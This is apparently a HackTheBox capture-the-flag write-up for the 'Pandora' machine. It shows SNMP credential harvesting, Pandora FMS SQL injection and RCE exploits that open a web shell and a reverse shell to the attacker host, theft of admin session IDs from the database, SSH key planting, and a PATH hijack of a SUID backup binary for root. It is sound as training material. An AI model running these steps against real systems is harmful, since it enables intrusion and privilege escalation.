Pandora
Enumeration
$ nmap -A -T4 --min-rate 5000 -p- -n -Pn --open 10.10.11.136
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 18:15 CEST
Nmap scan report for 10.10.11.136
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 39.83 ms 10.10.14.1
2 39.97 ms 10.10.11.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds
$ sudo nmap -sU --top-ports 100 -Pn --open 10.10.11.136
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 18:16 CEST
Nmap scan report for 10.10.11.136
Host is up (0.041s latency).
Not shown: 95 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 98.41 seconds
Site is about play
Using snmpwalk to enumerate SNMP, we find credentials.
daniel:HotelBabylon23
Initial Access
Access the machine via ssh
$ ssh daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
...
daniel@pandora:~$ whoami
daniel
Looking at Apache sites
daniel@pandora:/var/www/pandora/pandora_console/include$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
So port forward port 80 to our local machine and browse it.
We find https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated that exploits CVE-2021-32099
$ python sqlpwn.py -t 127.0.0.1:8888
URL: http://127.0.0.1:8888/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : 8q0ui8evsal456qs5s60jt3hc3
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test=
CMD > whoami
matt
Now we can read as matt Pandora's config file
CMD > cat /var/www/pandora/pandora_console/include/config.php
<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="PandoraFMSSecurePass2021";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0);
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>
daniel@pandora:~$ mysql -u pandora -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 20
Server version: 10.3.32-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| pandora |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]>
There are PHP sessions stored at tsessions_php
MariaDB [pandora]> select * from tsessions_php;
+----------------------------+-------------+------------------------------------------------------+
| id_session | last_active | data |
+----------------------------+-------------+------------------------------------------------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | 1638783555 | id_usuario|s:6:"daniel"; |
| 0ahul7feb1l9db7ffp8d25sjba | 1638789018 | NULL |
| 1p2c0cm9eed4u6npgr1ufdhg3v | 1749572113 | id_usuario|s:6:"daniel"; |
| 1um23if7s531kqf5da14kf5lvm | 1638792211 | NULL |
| 2e25c62vc3odbppmg6pjbf9bum | 1638786129 | NULL |
| 346uqacafar8pipuppubqet7ut | 1638540332 | id_usuario|s:6:"daniel"; |
| 3me2jjab4atfa5f8106iklh4fc | 1638795380 | NULL |
| 4f51mju7kcuonuqor3876n8o02 | 1638786842 | NULL |
| 4nsbidcmgfoh1gilpv8p5hpi2s | 1638535373 | id_usuario|s:6:"daniel"; |
| 59qae699l0971h13qmbpqahlls | 1638787305 | NULL |
| 5fihkihbip2jioll1a8mcsmp6j | 1638792685 | NULL |
| 5i352tsdh7vlohth30ve4o0air | 1638281946 | id_usuario|s:6:"daniel"; |
| 69gbnjrc2q42e8aqahb1l2s68n | 1641195617 | id_usuario|s:6:"daniel"; |
| 81f3uet7p3esgiq02d4cjj48rc | 1623957150 | NULL |
| 8m2e6h8gmphj79r9pq497vpdre | 1638446321 | id_usuario|s:6:"daniel"; |
| 8q0ui8evsal456qs5s60jt3hc3 | 1749578577 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| 8upeameujo9nhki3ps0fu32cgd | 1638787267 | NULL |
| 9vv4godmdam3vsq8pu78b52em9 | 1638881787 | id_usuario|s:6:"daniel"; |
| a3a49kc938u7od6e6mlip1ej80 | 1638795315 | NULL |
| agfdiriggbt86ep71uvm1jbo3f | 1638881664 | id_usuario|s:6:"daniel"; |
| cojb6rgubs18ipb35b3f6hf0vp | 1638787213 | NULL |
| d0carbrks2lvmb90ergj7jv6po | 1638786277 | NULL |
| f0qisbrojp785v1dmm8cu1vkaj | 1641200284 | id_usuario|s:6:"daniel"; |
| fikt9p6i78no7aofn74rr71m85 | 1638786504 | NULL |
| fqd96rcv4ecuqs409n5qsleufi | 1638786762 | NULL |
| g0kteepqaj1oep6u7msp0u38kv | 1638783230 | id_usuario|s:6:"daniel"; |
| g4e01qdgk36mfdh90hvcc54umq | 1638796349 | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; |
| gf40pukfdinc63nm5lkroidde6 | 1638786349 | NULL |
| heasjj8c48ikjlvsf1uhonfesv | 1638540345 | NULL |
| hsftvg6j5m3vcmut6ln6ig8b0f | 1638168492 | id_usuario|s:6:"daniel"; |
| jecd4v8f6mlcgn4634ndfl74rd | 1638456173 | id_usuario|s:6:"daniel"; |
| kp90bu1mlclbaenaljem590ik3 | 1638787808 | NULL |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | 1638796348 | NULL |
| nhc3tnsv7bckvim3bsh8r3jekc | 1749578186 | NULL |
| o3kuq4m5t5mqv01iur63e1di58 | 1638540482 | id_usuario|s:6:"daniel"; |
| oi2r6rjq9v99qt8q9heu3nulon | 1637667827 | id_usuario|s:6:"daniel"; |
| pjp312be5p56vke9dnbqmnqeot | 1638168416 | id_usuario|s:6:"daniel"; |
| qef3kp8hummmlqf0omrv8bbv5d | 1749578204 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | 1638787723 | NULL |
| r097jr6k9s7k166vkvaj17na1u | 1638787677 | NULL |
| rgku3s5dj4mbr85tiefv53tdoa | 1638889082 | id_usuario|s:6:"daniel"; |
| u5ktk2bt6ghb7s51lka5qou4r4 | 1638547193 | id_usuario|s:6:"daniel"; |
| u74bvn6gop4rl21ds325q80j0e | 1638793297 | id_usuario|s:6:"daniel"; |
+----------------------------+-------------+------------------------------------------------------+
43 rows in set (0.001 sec)
In the browser, edit the current one and put the admin one.
Now that we have an admin session, using this exploit https://github.com/UNICORDev/exploit-CVE-2020-5844 we can get a reverse shell as matt.
$ python exploit-CVE-2020-5844.py -t localhost 8888 -p qef3kp8hummmlqf0omrv8bbv5d -s 10.10.1
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Reverse Shell Mode
PHPSESS: qef3kp8hummmlqf0omrv8bbv5d
LOCALIP: 10.10.14.17:9999
WARNING: Be sure to start a local listener on the above IP and port.
WEBSITE: http://localhost:8888/pandora_console
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
SUCCESS: Reverse shell executed! Check your local listener on 10.10.14.17:9999
$ rlwrap nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.11.136] 52538
/bin/sh: 0: can't access tty; job control turned off
$ whoami
matt
Get the flag
Privilege Escalation
Enumerating SUID binaries, the one interesting is pandora_backup.
matt@pandora:/home/matt$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
Using strings we see that tar is using a wildcard.
The script fails with permission denied; it seems this shell is not valid.
Generate a private key and put it inside matt's .ssh folder.
matt@pandora:/home/matt/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpq+RmAIzEEXxkHuxX6zq9ZW46HG/z9DVBlgyhali@kali" > authorized_keys
<9ZW46HG/z9DVBlgyhYhhF7 kali@kali" > authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
$ ssh matt@10.10.11.136 -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
...
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$
Now the script works.
Inspecting the script with ltrace we can see that the tar executable is being called relatively.
matt@pandora:/var/www/pandora/pandora_console$ ltrace /usr/bin/pandora_backup
getuid() = 1000
geteuid() = 1000
setreuid(1000, 1000) = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
) = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
) = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
) = 39
+++ exited (status 1) +++
So we can hijack the binary.
Create a tar file in the home directory
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup successful!
Terminating program!
matt@pandora:~$ ls -alh /bin/bash
-rwsr-sr-x 1 root root 1.2M Jun 18 2020 /bin/bash
matt@pandora:~$ bash -p
bash-5.0# whoami
root
Post Exploitation
Get the flag